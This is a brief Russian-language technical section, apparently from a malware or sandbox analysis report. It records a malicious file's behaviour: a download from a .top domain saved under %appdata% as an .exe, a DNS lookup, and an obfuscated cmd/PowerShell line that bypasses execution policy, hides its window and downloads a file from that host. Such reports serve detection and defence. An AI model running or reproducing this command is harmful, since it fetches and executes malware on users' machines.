Техническая информация
- http://www.zonedopesa.top/read.php?f=1.gif как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "powErsHEll.eXe^ -eX^eCutIO^n^P^oLi^c^y BYpA^s^s -NoP^ro^File ^-Win^dO^wsTyLE ^hi^DDe^n (Ne^w-^o^B^J^e^Ct Sy^s^TE^m.^n^E^t^.weBc^lie^n^t).d^OWnloAd^Fi^L^E('http://www.zonedo...
- DNS ASK zo###opesa.top
- '<SYSTEM32>\cmd.exe' /C "powErsHEll.eXe^ -eX^eCutIO^n^P^oLi^c^y BYpA^s^s -NoP^ro^File ^-Win^dO^wsTyLE ^hi^DDe^n (Ne^w-^o^B^J^e^Ct Sy^s^TE^m.^n^E^t^.weBc^lie^n^t).d^OWnloAd^Fi^L^E('http://www.zonedo...' (со скрытым окном)